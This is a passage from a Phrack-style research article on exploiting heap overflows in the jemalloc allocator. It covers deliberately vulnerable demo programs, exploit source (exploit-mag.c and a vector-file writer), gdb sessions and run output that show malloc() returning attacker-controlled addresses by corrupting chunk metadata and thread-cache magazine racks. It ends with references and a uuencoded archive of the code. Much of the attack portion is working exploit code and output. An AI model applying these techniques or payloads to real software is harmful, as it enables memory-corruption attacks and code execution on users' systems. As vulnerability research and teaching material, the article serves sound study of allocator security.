fd = open("exploit2.v", O_WRONLY | O_TRUNC | O_CREAT, 0700);
write(fd, buffer, (p - (char *)buffer));
close(fd);
return 0;


It is now time for some action. First, let's compile and run the vulnerable
code.


$ ./vuln-chunk
# Chunk 0x28200000 belongs to arena 0x8049d98
# Chunk 0x28300000 belongs to arena 0x8049d98
...
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
p3 = 0x28302000
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................


The output is what one expects it to be. First, the vulnerable code forces
the allocator to initialize a new chunk (0x28300000) and then requests
a memory region which is given the address 0x28301030. The next call to
'malloc()' returns 0x28302000. So far so good. Let's feed our target
with the exploitation vector and see what happens.

$ ./exploit-chunk 0x8049d98
$ ./vuln-chunk exploit2.v
# Chunk 0x28200000 belongs to arena 0x8049d98
# Chunk 0x28300000 belongs to arena 0x8049d98
...
Read 56 bytes
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
p3 = 0x28301000
# Region at 0x28301030
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41         AAAAAAAAAAAAAAAA


As you can see the second call to 'malloc()' returns a new region
'p3 = 0x28301000' which lies 0x30 bytes before 'first' (0x28301030)!

Okay, so you're now probably thinking if this technique is useful. Please
note that the demonstration code presented in the previous two sections
was carefully coded to prepare the heap in a way that is convenient for
the attacker. It is for this purpose that these attacks may seem obscure
at first. On the contrary, in real life applications, heap overflows in
jemalloc will result in one of the following three cases:

1) Overwrite of an adjacent memory region.

2) Overwrite of the run metadata (in case the overflown region is the
last in a run).

3) Overwrite of the arena chunk metadata (in case the overflown region
is the last in a chunk).

That said we believe we have covered most of the cases that an attacker
may encounter. Feel free to contact us if you think we have missed
something important.


------[ 3.3.3 - Thread caches (tcache_t)

As we have analyzed in 2.1.7, thread cache magazine 'rounds' and other
magazine metadata are placed in normal memory regions. Assuming a 'mag_t'
along with its void pointer array has a total size of N, one can easily
acquire a memory region in the same run by calling 'malloc(N)'.

Overflowing a memory region adjacent to a 'mag_t' can result in 'malloc()'
returning arbitrary attacker controlled addresses. It's just a matter of
overwriting 'nrounds' and the contents of the void pointer array to
contain a stack address (or any other address of interest). A careful
reader of section 2.1.7 would have probably noticed that the same result
can be achieved by giving 'nrounds' a sufficiently large value in order to
pivot in the stack (or any user controlled memory region). This scenario is
pretty straightforward to exploit, so, we will have a look at the case of
overwriting a 'mag_rack_t' instead (it's not that sophisticated either).

Magazine racks are allocated by 'mag_rack_alloc()':


mag_rack_t *
mag_rack_create(arena_t *arena)
{
    ...
    return (arena_malloc_small(arena, sizeof(mag_rack_t) +
        (sizeof(bin_mags_t) * (nbins - 1)), true));
}


Now, let's calculate the size of a magazine rack:


(gdb) print nbins
$6 = 30
(gdb) print sizeof(mag_rack_t) + (sizeof(bin_mags_t) * (nbins - 1))
$24 = 240


A size of 240 is actually serviced by the bin holding regions of 256 bytes.
Issuing calls to 'malloc(256)' will eventually end up in a user controlled
region physically bordering a 'mag_rack_t'. The following vulnerable code
emulates this situation (file vuln-mag.c):


/* The 'vulnerable' thread. */
void *vuln_thread_runner(void *arg) {
  char *v;

  v = (char *)malloc(256);  /* [3-25] */
  printf("[vuln] v = %p\n", v);
  sleep(2);

  if(arg)
    strcpy(v, (char *)arg);
  return NULL;
}

/* Other threads performing allocations. */
void *thread_runner(void *arg) {
  size_t self = (size_t)pthread_self();
  char *p1, *p2;

  /* Allocation performed before the magazine rack is overflown. */
  p1 = (char *)malloc(16);
  printf("[%u] p1 = %p\n", self, p1);
  sleep(4);

  /* Allocation performed after overflowing the rack. */
  p2 = (char *)malloc(16);
  printf("[%u] p2 = %p\n", self, p2);
  sleep(4);
  return NULL;
}

int main(int argc, char *argv[]) {
  size_t tcount, i;
  pthread_t *tid, vid;

  if(argc != 3) {
    printf("%s <thread_count> <buff>\n", argv[0]);
    return 0;
  }

  /* The fake 'mag_t' structure will be placed here. */
  printf("[*] %p\n", getenv("FAKE_MAG_T"));

  tcount = atoi(argv[1]);
  tid = (pthread_t *)alloca(tcount * sizeof(pthread_t));

  pthread_create(&vid, NULL, vuln_thread_runner, argv[2]);
  for(i = 0; i < tcount; i++)
    pthread_create(&tid[i], NULL, thread_runner, NULL);

  pthread_join(vid, NULL);
  for(i = 0; i < tcount; i++)
    pthread_join(tid[i], NULL);

  pthread_exit(NULL);
}


The vulnerable code spawns a, so called, vulnerable thread that performs an
allocation of 256 bytes. A user supplied buffer, 'argv[2]' is copied in it
thus causing a heap overflow. A set of victim threads are then created. For
demonstration purposes, victim threads have a very limited lifetime, their
main purpose is to force jemalloc initialize new 'mag_rack_t' structures.
As the comments indicate, the allocations stored in 'p1' variables take
place before the magazine rack is overflown while the ones stored in 'p2'
will get affected by the fake magazine rack (in fact, only one of them
will; the one serviced by the overflown rack). The allocations performed
by victim threads are serviced by the newly initialized magazine racks.
Since each magazine rack spans 256 bytes, it is highly possible that the
overflown region allocated by the vulnerable thread will lie somewhere
around one of them (this requires that both the target magazine rack and
the overflown region will be serviced by the same arena).

Once the attacker is able to corrupt a magazine rack, exploitation is just
a matter of overwriting the appropriate 'bin_mags' entry. The entry should
be corrupted in such a way that 'curmag' should point to a fake 'mag_t'
structure. The attacker can choose to either use a large 'nrounds' value to
pivot into the stack, or give arbitrary addresses as members of the void
pointer array, preferably the latter. The exploitation code given below
makes use of the void pointer technique (file exploit-mag.c):


int main(int argc, char *argv[]) {
  char fake_mag_t[12 + 1];
  char buff[1024 + 1];
  size_t i, fake_mag_t_p;

  if(argc != 2) {
    printf("%s <mag_t address>\n", argv[0]);
    return 1;
  }
  fake_mag_t_p = (size_t)strtoul(argv[1], NULL, 16);

  /* Please read this...
   *
   * In order to void using NULL bytes, we use 0xffffffff as the value
   * for 'nrounds'. This will force jemalloc picking up 0x42424242 as
   * a valid region pointer instead of 0x41414141 :)
   */
  printf("[*] Assuming fake mag_t is at %p\n", (void *)fake_mag_t_p);
  *(size_t *)&fake_mag_t[0] = 0x42424242;
  *(size_t *)&fake_mag_t[4] = 0xffffffff;
  *(size_t *)&fake_mag_t[8] = 0x41414141;
  fake_mag_t[12] = 0;
  setenv("FAKE_MAG_T", fake_mag_t, 1);

  /* The buffer that will overwrite the victim 'mag_rack_t'. */
  printf("[*] Preparing input buffer\n");
  for(i = 0; i < 256; i++)
    *(size_t *)&buff[4 * i] = (size_t)fake_mag_t_p;
  buff[1024] = 0;

  printf("[*] Executing the vulnerable program\n");
  execl("./vuln-mag", "./vuln-mag", "16", buff, NULL);
  perror("execl");
  return 0;
}


Let's compile and run the exploit code:


$ ./exploit-mag
./exploit-mag <mag_t address>
$ ./exploit-mag 0xdeadbeef
[*] Assuming fake mag_t is at 0xdeadbeef
[*] Preparing input buffer
[*] Executing the vulnerable program
[*] 0xbfbfedd6
...


The vulnerable code reports that the environment variable 'FAKE_MAG_T'
containing our fake 'mag_t' structure is exported at 0xbfbfedd6.


$ ./exploit-mag 0xbfbfedd6
[*] Assuming fake mag_t is at 0xbfbfedd6
[*] Preparing input buffer
[*] Executing the vulnerable program
[*] 0xbfbfedd6
[vuln] v = 0x28311100
[673283456] p1 = 0x28317800
...
[673283456] p2 = 0x42424242
[673282496] p2 = 0x3d545f47


Neat. One of the victim threads, the one whose magazine rack is overflown,
returns an arbitrary address as a valid region. Overwriting the thread
caches is probably the most lethal attack but it suffers from a limitation
which we do not consider serious. The fact that the returned memory region
and the 'bin_mags[]' element both receive arbitrary addresses, results in a
segfault either on the deallocation of 'p2' or once the thread dies by
explicitly or implicitly calling 'pthread_exit()'. Possible shellcodes
should be triggered _before_ the thread exits or the memory region is
freed. Fair enough... :)


--[ 4 - A real vulnerability

For a detailed case study on jemalloc heap overflows see the second Art of
Exploitation paper in this issue of Phrack.


--[ 5 - Future work

This paper is the first public treatment of jemalloc that we are aware
of. In the near future, we are planning to research how one can corrupt
the various red black trees used by jemalloc for housekeeping. The rbtree
implementation (defined in rb.h) is fully based on preprocessor macros
and it's quite complex in nature. Although we have already debugged them,
due to lack of time we didn't attempt to exploit the various tree
operations performed on rbtrees. We wish that someone will continue our
work from where we left of. If no one does, then you definitely know whose
articles you'll soon be reading :)


--[ 6 - Conclusion

We have done the first step in analyzing jemalloc. We do know, however,
that we have not covered every possible potential of corrupting the
allocator in a controllable way. We hope to have helped those that were
about to study the FreeBSD userspace allocator or the internals of Firefox
but wanted to have a first insight before doing so. Any reader that
discovers mistakes in our article is advised to contact us as soon as
possible and let us know.

Many thanks to the Phrack staff for their comments. Also, thanks to George
Argyros for reviewing this work and making insightful suggestions.

Finally, we would like to express our respect to Jason Evans for such a
leet allocator. No, that isn't ironic; jemalloc is, in our opinion, one of
the best (if not the best) allocators out there.


--[ 7 - References

[JESA]  Standalone jemalloc
        - http://www.canonware.com/cgi-bin/gitweb.cgi?p=jemalloc.git

[JEMF]  Mozilla Firefox jemalloc
        - http://hg.mozilla.org/mozilla-central/file/tip/memory/jemalloc

[JEFB]  FreeBSD 8.2-RELEASE-i386 jemalloc
        - http://www.freebsd.org/cgi/cvsweb.cgi/src/lib/libc/stdlib/
            malloc.c?rev=1.183.2.5.4.1;content-type=text%2Fplain;
            only_with_tag=RELENG_8_2_0_RELEASE

[JELX]  Linux port of the FreeBSD jemalloc
        - http://www.canonware.com/download/jemalloc/
            jemalloc_linux_20080828a.tbz

[JE06]  Jason Evans, A Scalable Concurrent malloc(3) Implementation for
            FreeBSD
        - http://people.freebsd.org/~jasone/jemalloc/bsdcan2006
            /jemalloc.pdf

[PV10]  Peter Vreugdenhil, Pwn2Own 2010 Windows 7 Internet Explorer 8
            exploit
        - http://vreugdenhilresearch.nl
            /Pwn2Own-2010-Windows7-InternetExplorer8.pdf

[FENG]  Alexander Sotirov, Heap Feng Shui in Javascript
        - http://www.phreedom.org/research/heap-feng-shui/
            heap-feng-shui.html

[HOEJ]  Mark Daniel, Jake Honoroff, Charlie Miller, Engineering Heap
            Overflow Exploits with Javascript
        - http://securityevaluators.com/files/papers/isewoot08.pdf

[CVRS]  Chris Valasek, Ryan Smith, Exploitation in the Modern Era
            (Blueprint)
        - https://www.blackhat.com/html/bh-eu-11/
            bh-eu-11-briefings.html#Valasek

[VPTR]  rix, Smashing C++ VPTRs
        - http://www.phrack.org/issues.html?issue=56&id=8

[HAPF]  huku, argp, Patras Heap Massacre
        - http://fosscomm.ceid.upatras.gr/

[APHN]  argp, FreeBSD Kernel Massacre
        - http://ph-neutral.darklab.org/previous/0x7db/talks.html

[UJEM]  unmask_jemalloc
        - https://github.com/argp/unmask_jemalloc


--[ 8 - Code

begin 644 code.tar.gz
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
